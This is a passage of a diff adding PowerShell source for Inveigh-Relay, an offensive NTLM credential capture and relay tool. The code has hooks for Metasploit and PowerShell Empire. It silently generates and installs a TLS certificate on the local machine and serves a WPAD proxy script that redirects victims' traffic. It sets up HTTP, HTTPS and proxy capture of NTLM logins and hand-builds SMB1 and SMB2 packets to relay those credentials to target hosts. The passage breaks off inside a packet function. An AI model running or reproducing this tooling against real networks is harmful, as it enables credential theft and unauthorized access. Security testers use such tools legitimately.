+if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's PowerShell Extension
+{
+ $inveigh.tool = 1
+ $inveigh.output_stream_only = $true
+ $inveigh.newline = ""
+ $ConsoleOutput = "N"
+}
+elseif($Tool -eq 2) # PowerShell Empire
+{
+ $inveigh.tool = 2
+ $inveigh.output_stream_only = $true
+ $inveigh.console_input = $false
+ $inveigh.newline = ""
+ $LogOutput = "N"
+ $ShowHelp = "N"
+
+ switch ($ConsoleOutput)
+ {
+
+ 'Low'
+ {
+ $ConsoleOutput = "Low"
+ }
+
+ 'Medium'
+ {
+ $ConsoleOutput = "Medium"
+ }
+
+ default
+ {
+ $ConsoleOutput = "Y"
+ }
+
+ }
+
+}
+else
+{
+ $inveigh.tool = 0
+ $inveigh.newline = ""
+}
+
+# Write startup messages
+$inveigh.output_queue.Add("[*] Inveigh Relay $inveigh_version started at $(Get-Date -format s)") > $null
+
+if($firewall_status)
+{
+ $inveigh.output_queue.Add("[!] Windows Firewall = Enabled") > $null
+}
+
+if($HTTP -eq 'Y')
+{
+
+ if($HTTP_port_check)
+ {
+ $HTTP = "N"
+ $inveigh.output_queue.Add("[+] HTTP Capture/Relay Disabled Due To In Use Port $HTTPPort") > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] HTTP Capture/Relay = Enabled") > $null
+
+ if($HTTPIP)
+ {
+ $inveigh.output_queue.Add("[+] HTTP IP Address = $HTTPIP") > $null
+ }
+
+ if($HTTPPort -ne 80)
+ {
+ $inveigh.output_queue.Add("[+] HTTP Port = $HTTPPort") > $null
+ }
+ }
+
+}
+else
+{
+ $inveigh.output_queue.Add("[+] HTTP Capture/Relay = Disabled") > $null
+}
+
+if($HTTPS -eq 'Y')
+{
+
+ if($HTTPS_port_check)
+ {
+ $HTTPS = "N"
+ $inveigh.HTTPS = $false
+ $inveigh.output_queue.Add("[-] HTTPS Capture/Relay Disabled Due To In Use Port $HTTPSPort") > $null
+ }
+ else
+ {
+
+ try
+ {
+ $inveigh.certificate_issuer = $HTTPSCertIssuer
+ $inveigh.certificate_CN = $HTTPSCertSubject
+ $inveigh.output_queue.Add("[+] HTTPS Certificate Issuer = " + $inveigh.certificate_issuer) > $null
+ $inveigh.output_queue.Add("[+] HTTPS Certificate CN = " + $inveigh.certificate_CN) > $null
+ $certificate_check = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -match $inveigh.certificate_issuer})
+
+ if(!$certificate_check)
+ {
+ # credit to subTee for cert creation code from Interceptor
+ $certificate_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName"
+ $certificate_distinguished_name.Encode( "CN=" + $inveigh.certificate_CN, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
+ $certificate_issuer_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName"
+ $certificate_issuer_distinguished_name.Encode("CN=" + $inveigh.certificate_issuer, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
+ $certificate_key = new-object -com "X509Enrollment.CX509PrivateKey"
+ $certificate_key.ProviderName = "Microsoft Enhanced RSA and AES Cryptographic Provider"
+ $certificate_key.KeySpec = 2
+ $certificate_key.Length = 2048
+ $certificate_key.MachineContext = 1
+ $certificate_key.Create()
+ $certificate_server_auth_OID = new-object -com "X509Enrollment.CObjectId"
+ $certificate_server_auth_OID.InitializeFromValue("1.3.6.1.5.5.7.3.1")
+ $certificate_enhanced_key_usage_OID = new-object -com "X509Enrollment.CObjectIds.1"
+ $certificate_enhanced_key_usage_OID.add($certificate_server_auth_OID)
+ $certificate_enhanced_key_usage_extension = new-object -com "X509Enrollment.CX509ExtensionEnhancedKeyUsage"
+ $certificate_enhanced_key_usage_extension.InitializeEncode($certificate_enhanced_key_usage_OID)
+ $certificate = new-object -com "X509Enrollment.CX509CertificateRequestCertificate"
+ $certificate.InitializeFromPrivateKey(2,$certificate_key,"")
+ $certificate.Subject = $certificate_distinguished_name
+ $certificate.Issuer = $certificate_issuer_distinguished_name
+ $certificate.NotBefore = (get-date).AddDays(-271)
+ $certificate.NotAfter = $certificate.NotBefore.AddDays(824)
+ $certificate_hash_algorithm_OID = New-Object -ComObject X509Enrollment.CObjectId
+ $certificate_hash_algorithm_OID.InitializeFromAlgorithmName(1,0,0,"SHA256")
+ $certificate.HashAlgorithm = $certificate_hash_algorithm_OID
+ $certificate.X509Extensions.Add($certificate_enhanced_key_usage_extension)
+ $certificate_basic_constraints = new-object -com "X509Enrollment.CX509ExtensionBasicConstraints"
+ $certificate_basic_constraints.InitializeEncode("true",1)
+ $certificate.X509Extensions.Add($certificate_basic_constraints)
+ $certificate.Encode()
+ $certificate_enrollment = new-object -com "X509Enrollment.CX509Enrollment"
+ $certificate_enrollment.InitializeFromRequest($certificate)
+ $certificate_data = $certificate_enrollment.CreateRequest(0)
+ $certificate_enrollment.InstallResponse(2,$certificate_data,0,"")
+ $inveigh.certificate = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -match $inveigh.certificate_issuer})
+ $inveigh.HTTPS = $true
+ $inveigh.output_queue.Add("[+] HTTPS Capture/Relay = Enabled") > $null
+ }
+ else
+ {
+
+ if($HTTPSForceCertDelete -eq 'Y')
+ {
+ $inveigh.HTTPS_force_certificate_delete = $true
+ }
+
+ $inveigh.HTTPS_existing_certificate = $true
+ $inveigh.output_queue.Add("[+] HTTPS Capture = Using Existing Certificate") > $null
+ }
+
+ }
+ catch
+ {
+ $HTTPS = "N"
+ $inveigh.HTTPS = $false
+ $inveigh.output_queue.Add("[-] HTTPS Capture/Relay Disabled Due To Certificate Error") > $null
+ }
+
+ }
+
+}
+else
+{
+ $inveigh.output_queue.Add("[+] HTTPS Capture/Relay = Disabled") > $null
+}
+
+if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
+{
+
+ if($Challenge)
+ {
+ $inveigh.output_queue.Add("[+] NTLM Challenge = $Challenge") > $null
+ }
+
+ if($MachineAccounts -eq 'N')
+ {
+ $inveigh.output_queue.Add("[+] Machine Account Capture = Disabled") > $null
+ $inveigh.machine_accounts = $false
+ }
+ else
+ {
+ $inveigh.machine_accounts = $true
+ }
+
+ $inveigh.output_queue.Add("[+] WPAD Authentication = $WPADAuth") > $null
+
+ if($WPADAuth -eq "NTLM")
+ {
+ $WPADAuthIgnore = ($WPADAuthIgnore | Where-Object {$_ -and $_.Trim()})
+
+ if($WPADAuthIgnore.Count -gt 0)
+ {
+ $inveigh.output_queue.Add("[+] WPAD NTLM Authentication Ignore List = " + ($WPADAuthIgnore -join ",")) > $null
+ }
+
+ }
+
+ $HTTPResetDelay = ($HTTPResetDelay | Where-Object {$_ -and $_.Trim()})
+
+ if($HTTPResetDelay.Count -gt 0)
+ {
+ $inveigh.output_queue.Add("[+] HTTP Reset Delay List = " + ($HTTPResetDelay -join ",")) > $null
+ $inveigh.output_queue.Add("[+] HTTP Reset Delay Timeout = $HTTPResetDelayTimeout Seconds") > $null
+ }
+
+}
+
+if($Proxy -eq 'Y')
+{
+
+ if($proxy_port_check)
+ {
+ $HTTP = "N"
+ $inveigh.output_queue.Add("[+] Proxy Capture/Relay Disabled Due To In Use Port $ProxyPort") > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] Proxy Capture/Relay = Enabled") > $null
+ $inveigh.output_queue.Add("[+] Proxy Port = $ProxyPort") > $null
+ $ProxyPortFailover = $ProxyPort + 1
+ $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $proxy_WPAD_IP`:$ProxyPortFailover; DIRECT`";}"
+ $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()})
+
+ if($ProxyIgnore.Count -gt 0)
+ {
+ $inveigh.output_queue.Add("[+] Proxy Ignore List = " + ($ProxyIgnore -join ",")) > $null
+ }
+
+ }
+
+}
+
+if($Target.Count -eq 1)
+{
+ $inveigh.output_queue.Add("[+] Relay Target = " + ($Target -join ",")) > $null
+}
+else
+{
+ $inveigh.output_queue.Add("[+] Relay Targets = " + ($Target -join ",")) > $null
+}
+
+if($Username)
+{
+
+ if($Username.Count -eq 1)
+ {
+ $inveigh.output_queue.Add("[+] Relay Username = " + ($Username -join ",")) > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] Relay Usernames = " + ($Username -join ",")) > $null
+ }
+
+}
+
+if($RelayAutoDisable -eq 'Y')
+{
+ $inveigh.output_queue.Add("[+] Relay Auto Disable = Enabled") > $null
+}
+else
+{
+ $inveigh.output_queue.Add("[+] Relay Auto Disable = Disabled") > $null
+}
+
+if($RelayAutoExit -eq 'Y')
+{
+ $inveigh.output_queue.Add("[+] Relay Auto Exit = Enabled") > $null
+}
+else
+{
+ $inveigh.output_queue.Add("[+] Relay Auto Exit = Disabled") > $null
+}
+
+if($Service)
+{
+ $inveigh.output_queue.Add("[+] Relay Service = $Service") > $null
+}
+
+if($SMB1)
+{
+ $inveigh.output_queue.Add("[+] SMB Version = SMB1") > $null
+ $SMB_version = 'SMB1'
+}
+
+if($ConsoleOutput -ne 'N')
+{
+
+ if($ConsoleOutput -eq 'Y')
+ {
+ $inveigh.output_queue.Add("[+] Real Time Console Output = Enabled") > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] Real Time Console Output = $ConsoleOutput") > $null
+ }
+
+ $inveigh.console_output = $true
+
+ if($ConsoleStatus -eq 1)
+ {
+ $inveigh.output_queue.Add("[+] Console Status = $ConsoleStatus Minute") > $null
+ }
+ elseif($ConsoleStatus -gt 1)
+ {
+ $inveigh.output_queue.Add("[+] Console Status = $ConsoleStatus Minutes") > $null
+ }
+
+}
+else
+{
+
+ if($inveigh.tool -eq 1)
+ {
+ $inveigh.output_queue.Add("[!] Real Time Console Output Disabled Due To External Tool Selection") > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] Real Time Console Output = Disabled") > $null
+ }
+
+}
+
+if($ConsoleUnique -eq 'Y')
+{
+ $inveigh.console_unique = $true
+}
+else
+{
+ $inveigh.console_unique = $false
+}
+
+if($FileOutput -eq 'Y')
+{
+ $inveigh.output_queue.Add("[+] Real Time File Output = Enabled") > $null
+ $inveigh.output_queue.Add("[+] Output Directory = $output_directory") > $null
+ $inveigh.file_output = $true
+}
+else
+{
+ $inveigh.output_queue.Add("[+] Real Time File Output = Disabled") > $null
+}
+
+if($FileUnique -eq 'Y')
+{
+ $inveigh.file_unique = $true
+}
+else
+{
+ $inveigh.file_unique = $false
+}
+
+if($LogOutput -eq 'Y')
+{
+ $inveigh.log_output = $true
+}
+else
+{
+ $inveigh.log_output = $false
+}
+
+if($RunTime -eq 1)
+{
+ $inveigh.output_queue.Add("[+] Run Time = $RunTime Minute") > $null
+}
+elseif($RunTime -gt 1)
+{
+ $inveigh.output_queue.Add("[+] Run Time = $RunTime Minutes") > $null
+}
+
+if($ShowHelp -eq 'Y')
+{
+ $inveigh.output_queue.Add("[!] Run Stop-Inveigh to stop Inveigh-Relay") > $null
+
+ if($inveigh.console_output)
+ {
+ $inveigh.output_queue.Add("[*] Press any key to stop real time console output") > $null
+ }
+
+}
+
+while($inveigh.output_queue.Count -gt 0)
+{
+
+ switch -Wildcard ($inveigh.output_queue[0])
+ {
+
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
+ {
+
+ if($inveigh.status_output -and $inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.output_queue[0] + $inveigh.newline)
+ }
+ elseif($inveigh.status_output)
+ {
+ Write-Warning($inveigh.output_queue[0])
+ }
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($inveigh.output_queue[0]) > $null
+ }
+
+ $inveigh.output_queue.RemoveAt(0)
+ }
+
+ default
+ {
+
+ if($inveigh.status_output -and $inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.output_queue[0] + $inveigh.newline)
+ }
+ elseif($inveigh.status_output)
+ {
+ Write-Output($inveigh.output_queue[0])
+ }
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($inveigh.output_queue[0]) > $null
+ }
+
+ $inveigh.output_queue.RemoveAt(0)
+ }
+
+ }
+
+}
+
+$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
+$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
+$process_ID = $process_ID -replace "-00-00",""
+[Byte[]]$inveigh.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+# Begin ScriptBlocks
+
+# Shared Basic Functions ScriptBlock
+$shared_basic_functions_scriptblock =
+{
+
+ function DataLength2
+ {
+ param ([Int]$length_start,[Byte[]]$string_extract_data)
+
+ $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0)
+ return $string_length
+ }
+
+ function DataLength4
+ {
+ param ([Int]$length_start,[Byte[]]$string_extract_data)
+
+ $string_length = [System.BitConverter]::ToUInt32($string_extract_data[$length_start..($length_start + 3)],0)
+ return $string_length
+ }
+
+ function DataToString
+ {
+ param ([Int]$string_start,[Int]$string_length,[Byte[]]$string_extract_data)
+
+ $string_data = [System.BitConverter]::ToString($string_extract_data[$string_start..($string_start + $string_length - 1)])
+ $string_data = $string_data -replace "-00",""
+ $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $string_extract = New-Object System.String ($string_data,0,$string_data.Length)
+ return $string_extract
+ }
+
+}
+
+# Packet Functions ScriptBlock
+$packet_functions_scriptblock =
+{
+ function ConvertFrom-PacketOrderedDictionary
+ {
+ param($packet_ordered_dictionary)
+
+ ForEach($field in $packet_ordered_dictionary.Values)
+ {
+ $byte_array += $field
+ }
+
+ return $byte_array
+ }
+
+ #NetBIOS
+
+ function New-PacketNetBIOSSessionService
+ {
+ param([Int]$packet_header_length,[Int]$packet_data_length)
+
+ [Byte[]]$packet_netbios_session_service_length = [System.BitConverter]::GetBytes($packet_header_length + $packet_data_length)
+ $packet_NetBIOS_session_service_length = $packet_netbios_session_service_length[2..0]
+
+ $packet_NetBIOSSessionService = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NetBIOSSessionService.Add("Message_Type",[Byte[]](0x00))
+ $packet_NetBIOSSessionService.Add("Length",[Byte[]]($packet_netbios_session_service_length))
+
+ return $packet_NetBIOSSessionService
+ }
+
+ #SMB1
+
+ function New-PacketSMBHeader
+ {
+ param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID)
+
+ $packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBHeader.Add("Protocol",[Byte[]](0xff,0x53,0x4d,0x42))
+ $packet_SMBHeader.Add("Command",$packet_command)
+ $packet_SMBHeader.Add("ErrorClass",[Byte[]](0x00))
+ $packet_SMBHeader.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBHeader.Add("ErrorCode",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("Flags",$packet_flags)
+ $packet_SMBHeader.Add("Flags2",$packet_flags2)
+ $packet_SMBHeader.Add("ProcessIDHigh",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMBHeader.Add("Reserved2",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("TreeID",$packet_tree_ID)
+ $packet_SMBHeader.Add("ProcessID",$packet_process_ID)
+ $packet_SMBHeader.Add("UserID",$packet_user_ID)
+ $packet_SMBHeader.Add("MultiplexID",[Byte[]](0x00,0x00))
+
+ return $packet_SMBHeader
+ }
+
+ function New-PacketSMBNegotiateProtocolRequest
+ {
+ param([String]$packet_version)
+
+ if($packet_version -eq 'SMB1')
+ {
+ [Byte[]]$packet_byte_count = 0x0c,0x00
+ }
+ else
+ {
+ [Byte[]]$packet_byte_count = 0x22,0x00
+ }
+
+ $packet_SMBNegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBNegotiateProtocolRequest.Add("WordCount",[Byte[]](0x00))
+ $packet_SMBNegotiateProtocolRequest.Add("ByteCount",$packet_byte_count)
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name",[Byte[]](0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00))
+
+ if($packet_version -ne 'SMB1')
+ {
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat2",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name2",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x30,0x30,0x32,0x00))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat3",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name3",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x3f,0x3f,0x3f,0x00))
+ }
+
+ return $packet_SMBNegotiateProtocolRequest
+ }
+
+ function New-PacketSMBSessionSetupAndXRequest
+ {
+ param([Byte[]]$packet_security_blob)
+
+ [Byte[]]$packet_byte_count = [System.BitConverter]::GetBytes($packet_security_blob.Length)
+ $packet_byte_count = $packet_byte_count[0,1]
+ [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length + 5)
+ $packet_security_blob_length = $packet_security_blob_length[0,1]
+
+ $packet_SMBSessionSetupAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBSessionSetupAndXRequest.Add("WordCount",[Byte[]](0x0c))
+ $packet_SMBSessionSetupAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBSessionSetupAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("MaxBuffer",[Byte[]](0xff,0xff))
+ $packet_SMBSessionSetupAndXRequest.Add("MaxMpxCount",[Byte[]](0x02,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("VCNumber",[Byte[]](0x01,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("SessionKey",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("SecurityBlobLength",$packet_byte_count)
+ $packet_SMBSessionSetupAndXRequest.Add("Reserved2",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("Capabilities",[Byte[]](0x44,0x00,0x00,0x80))
+ $packet_SMBSessionSetupAndXRequest.Add("ByteCount",$packet_security_blob_length)
+ $packet_SMBSessionSetupAndXRequest.Add("SecurityBlob",$packet_security_blob)
+ $packet_SMBSessionSetupAndXRequest.Add("NativeOS",[Byte[]](0x00,0x00,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("NativeLANManage",[Byte[]](0x00,0x00))
+
+ return $packet_SMBSessionSetupAndXRequest
+ }
+
+ function New-PacketSMBTreeConnectAndXRequest
+ {
+ param([Byte[]]$packet_path)
+
+ [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length + 7)
+ $packet_path_length = $packet_path_length[0,1]
+
+ $packet_SMBTreeConnectAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBTreeConnectAndXRequest.Add("WordCount",[Byte[]](0x04))
+ $packet_SMBTreeConnectAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBTreeConnectAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("Flags",[Byte[]](0x00,0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("PasswordLength",[Byte[]](0x01,0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("ByteCount",$packet_path_length)
+ $packet_SMBTreeConnectAndXRequest.Add("Password",[Byte[]](0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("Tree",$packet_path)
+ $packet_SMBTreeConnectAndXRequest.Add("Service",[Byte[]](0x3f,0x3f,0x3f,0x3f,0x3f,0x00))
+
+ return $packet_SMBTreeConnectAndXRequest
+ }
+
+ function New-PacketSMBNTCreateAndXRequest
+ {
+ param([Byte[]]$packet_named_pipe)
+
+ [Byte[]]$packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length)
+ $packet_named_pipe_length = $packet_named_pipe_length[0,1]
+ [Byte[]]$packet_file_name_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length - 1)
+ $packet_file_name_length = $packet_file_name_length[0,1]
+
+ $packet_SMBNTCreateAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBNTCreateAndXRequest.Add("WordCount",[Byte[]](0x18))
+ $packet_SMBNTCreateAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBNTCreateAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBNTCreateAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("Reserved2",[Byte[]](0x00))
+ $packet_SMBNTCreateAndXRequest.Add("FileNameLen",$packet_file_name_length)
+ $packet_SMBNTCreateAndXRequest.Add("CreateFlags",[Byte[]](0x16,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("RootFID",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("AccessMask",[Byte[]](0x00,0x00,0x00,0x02))
+ $packet_SMBNTCreateAndXRequest.Add("AllocationSize",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("FileAttributes",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("ShareAccess",[Byte[]](0x07,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("Disposition",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("CreateOptions",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("Impersonation",[Byte[]](0x02,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("SecurityFlags",[Byte[]](0x00))
+ $packet_SMBNTCreateAndXRequest.Add("ByteCount",$packet_named_pipe_length)
+ $packet_SMBNTCreateAndXRequest.Add("Filename",$packet_named_pipe)
+
+ return $packet_SMBNTCreateAndXRequest
+ }
+
+ function New-PacketSMBReadAndXRequest
+ {
+ $packet_SMBReadAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBReadAndXRequest.Add("WordCount",[Byte[]](0x0a))
+ $packet_SMBReadAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBReadAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBReadAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBReadAndXRequest.Add("FID",[Byte[]](0x00,0x40))
+ $packet_SMBReadAndXRequest.Add("Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBReadAndXRequest.Add("MaxCountLow",[Byte[]](0x58,0x02))
+ $packet_SMBReadAndXRequest.Add("MinCount",[Byte[]](0x58,0x02))
+ $packet_SMBReadAndXRequest.Add("Unknown",[Byte[]](0xff,0xff,0xff,0xff))
+ $packet_SMBReadAndXRequest.Add("Remaining",[Byte[]](0x00,0x00))
+ $packet_SMBReadAndXRequest.Add("ByteCount",[Byte[]](0x00,0x00))
+
+ return $packet_SMBReadAndXRequest
+ }
+
+ function New-PacketSMBWriteAndXRequest
+ {
+ param([Byte[]]$packet_file_ID,[Int]$packet_RPC_length)
+
+ [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length)
+ $packet_write_length = $packet_write_length[0,1]
+
+ $packet_SMBWriteAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBWriteAndXRequest.Add("WordCount",[Byte[]](0x0e))
+ $packet_SMBWriteAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBWriteAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBWriteAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBWriteAndXRequest.Add("FID",$packet_file_ID)
+ $packet_SMBWriteAndXRequest.Add("Offset",[Byte[]](0xea,0x03,0x00,0x00))
+ $packet_SMBWriteAndXRequest.Add("Reserved2",[Byte[]](0xff,0xff,0xff,0xff))
+ $packet_SMBWriteAndXRequest.Add("WriteMode",[Byte[]](0x08,0x00))
+ $packet_SMBWriteAndXRequest.Add("Remaining",$packet_write_length)
+ $packet_SMBWriteAndXRequest.Add("DataLengthHigh",[Byte[]](0x00,0x00))
+ $packet_SMBWriteAndXRequest.Add("DataLengthLow",$packet_write_length)
+ $packet_SMBWriteAndXRequest.Add("DataOffset",[Byte[]](0x3f,0x00))
+ $packet_SMBWriteAndXRequest.Add("HighOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBWriteAndXRequest.Add("ByteCount",$packet_write_length)
+
+ return $packet_SMBWriteAndXRequest
+ }
+
+ function New-PacketSMBCloseRequest
+ {
+ param ([Byte[]]$packet_file_ID)
+
+ $packet_SMBCloseRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBCloseRequest.Add("WordCount",[Byte[]](0x03))
+ $packet_SMBCloseRequest.Add("FID",$packet_file_ID)
+ $packet_SMBCloseRequest.Add("LastWrite",[Byte[]](0xff,0xff,0xff,0xff))
+ $packet_SMBCloseRequest.Add("ByteCount",[Byte[]](0x00,0x00))
+
+ return $packet_SMBCloseRequest
+ }
+
+ function New-PacketSMBTreeDisconnectRequest
+ {
+ $packet_SMBTreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBTreeDisconnectRequest.Add("WordCount",[Byte[]](0x00))
+ $packet_SMBTreeDisconnectRequest.Add("ByteCount",[Byte[]](0x00,0x00))
+
+ return $packet_SMBTreeDisconnectRequest
+ }
+
+ function New-PacketSMBLogoffAndXRequest
+ {
+ $packet_SMBLogoffAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBLogoffAndXRequest.Add("WordCount",[Byte[]](0x02))
+ $packet_SMBLogoffAndXRequest.Add("AndXCommand",[Byte[]](0xff))
+ $packet_SMBLogoffAndXRequest.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBLogoffAndXRequest.Add("AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBLogoffAndXRequest.Add("ByteCount",[Byte[]](0x00,0x00))
+
+ return $packet_SMBLogoffAndXRequest
+ }
+
+ #SMB2
+
+ function New-PacketSMB2Header
+ {
+ param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
+
+ [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00
+
+ $packet_SMB2Header = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2Header.Add("ProtocolID",[Byte[]](0xfe,0x53,0x4d,0x42))
+ $packet_SMB2Header.Add("StructureSize",[Byte[]](0x40,0x00))
+ $packet_SMB2Header.Add("CreditCharge",[Byte[]](0x01,0x00))
+ $packet_SMB2Header.Add("ChannelSequence",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("Command",$packet_command)
+ $packet_SMB2Header.Add("CreditRequest",$packet_credit_request)
+ $packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("MessageID",$packet_message_ID)
+ $packet_SMB2Header.Add("ProcessID",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("TreeID",$packet_tree_ID)
+ $packet_SMB2Header.Add("SessionID",$packet_session_ID)
+ $packet_SMB2Header.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ return $packet_SMB2Header
+ }
+
+ function New-PacketSMB2NegotiateProtocolRequest
+ {
+ $packet_SMB2NegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2NegotiateProtocolRequest.Add("StructureSize",[Byte[]](0x24,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("DialectCount",[Byte[]](0x02,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("SecurityMode",[Byte[]](0x01,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Capabilities",[Byte[]](0x40,0x00,0x00,0x00))
